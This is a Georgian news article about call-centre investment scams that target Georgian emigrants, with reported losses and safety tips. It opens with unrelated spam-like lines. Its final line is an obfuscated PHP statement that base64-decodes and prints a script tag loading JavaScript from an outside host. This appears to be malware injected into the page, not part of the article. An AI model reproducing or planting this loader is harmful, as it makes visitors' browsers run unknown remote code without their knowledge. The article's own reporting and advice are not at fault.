global distribution
გარე ავეჯი

ბოლო წლების განმავლობაში ე.წ. ქოლცენტრების თაღლითური ქსელი მნიშვნელოვნად გაფართოვდა. ეს სქემები მხოლოდ უცხოელებზე აღარ არის მიმართული – სულ უფრო ხშირად ჩნდებიან ქართველები, რომლებიც ამ ქსელების მსხვერპლნი ან თავად მონაწილენი არიან. განსაკუთრებით საგანგაშოა ის ფაქტი, რომ დაზარალებულთა რიცხვში ემიგრანტი ქართველებიც ხვდებიან. ადამიანები, რომლებიც ფინანსურად მოწყვლად მდგომარეობაში იმყოფებიან, ხშირან მიმზიდველი ფინანსური შემოთავაზებების ხარჯზე  საერთაშორისო თაღლითობის მსხვერპლნი ხდებიან. 

ბოლო დროს გაჩნდა ფაქტები, როდესაც ქართველი ემიგრანტები, ძირითადად იტალიაში, საბერძნეთსა და გერმანიაში მცხოვრები პირები გახდნენ თაღლითური ქოლცენტრების მსხვერპლნი.
 
ასევე უნდა ითქვას, რომ ხშირია შემთხვევები როდესაც, სოციალური ქსელით, ანონიმურად გაცნობილი მამაკაცები, ვითომ პირადი ურთიერთობისთვის ხშირად მოიპოვებენ გოგონების ან ქალბატონების ნდობას და მერე მათ თაღლითობის სამიზნედ იყენებენ. 

აღნიშნული თაღითობის სამი შემთხვევა "ბიზნესთაიმისთვის" დღეს გახდა ცნობილი, საუბარია რამდენიმე ათას ევროზე (ათიათასამდე) თუმცა დაზარალებულებმა არ ისურვეს ვინაობის გამხელა და დეტალებზე საუბარი, ერთ-ერთი დაზარალებული 70 წლამდე ემიგრანტი ქალბატონია, რომელმაც სოლიდური თანხა დაკარგა. 
 
სოციალურ ქსელებში უკვე არსებობს რამდენიმე ჯგუფი, სადაც ემიგრანტი ქართველები ერთმანეთს აფრთხილებენ კონკრეტული ვებსაიტების, „ფინანსური მენეჯერების“ და ე.წ. ბირჟების თაღლითობებზე.

აღსანიშნავია, რომ სამწუხაროდ, დაზარალებულთა ზუსტი სტატისტიკა არ არსებობს, ვინაიდან დაზარალებულთა უმეტესობა, როცა აცნობიერებს თუ რა შეეთხვა, ცდილობს მომხდარი საიდუმლოდ დაიტოვოს.

 
ცნობისთვის, 2024 წელს იტალიის სამართალდამცავებმა დაადგინეს, რამდენიმე შემთხვევა, როდესაც ემიგრანტი ქართველები ინტერნეტის მეშვეობით დაუკავშირდნენ ბულგარეთში დარეგისტრირებულ ე.წ. საინვესტიციო კომპანიას და ჩარიცხეს 2,000-დან 10,000 ევრო-მდე ოდენობის თანხა კრიპტო ვალუტის, ან ბირჟაზე სავაჭრო მიზნებისთვის. დაზარალებულების თქმით, პირველ კვირებში ყველაფერი რეალურად გამოიყურებოდა ანგარიშზე ვითომდა აისახა მოგება - თუმცა შემდეგ კავშირი გაწყდა და თანხაც უკვალოდ გაქრა.

 

რა არის ქოლცენტრი და როგორ მუშაობს სქემა?

ქოლცენტრები იმიტირებენ პროფესიულ საფინანსო კომპანიებს და ინტერნეტით ან ტელეფონით უცხოელ მსხვერპლებს არწმუნებენ, რომ მცირე ინვესტიციით სოლიდური შემოსავლის მიღება შეუძლიათ. თაღლითები იყენებენ ფსევდო-პლატფორმებს, რომელთაც შეუძლიათ შექმნან წარმატებული ინვესტიციის ილუზია – თუმცა, საბოლოოდ, დაზარალებული კარგავს ყველაფერს.

ქოლცენტრების ქსელი ხშირად მომწიფებულია სხვადასხვა ქვეყანაში, მათ შორის საქართველოშიც. გერმანიის, ისრაელის, ბულგარეთის, სერბეთისა და საქართველოს სამართალდამცველები ერთობლივად იძიებენ ათობით მილიონ ევროზე შეფასებულ თაღლითობას.

 

რისკები და რეკომენდაციები

  • თუ უცხო ენა კარგად არ გესმით, არ ენდოთ უცხოურ ზარებს ფინანსური შეთავაზებებით.
  • არავითარ შემთხვევაში არ გააკეთოთ თანხის გადარიცხვა პლატფორმაზე, რომელიც არ არის ლიცენზირებული შესაბამისი მარეგულირებელი ორგანოს მიერ.
  • გადაამოწმეთ კომპანიის დასახელება დამოუკიდებლად, მაგალითად, ევროკავშირის ფინანსური ზედამხედველობის ვებსაიტებზე.
  • ეჭვის შემთხვევაში დაუკავშირდით ელჩობას ან კონსულატს.

 

იცოდეთ, რომ ქოლცენტრების თემა აღარ არის მხოლოდ უცხოელებზე მიმართული თაღლითობა. იგი დღეს გლობალურ საფრთხედ იქცა, რომელშიც საქართველოც ჩართულია როგორც ორგანიზატორების, ისე დაზარალებულების დონეზე. 

ავტორი
მირანდა შურღაია
752
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");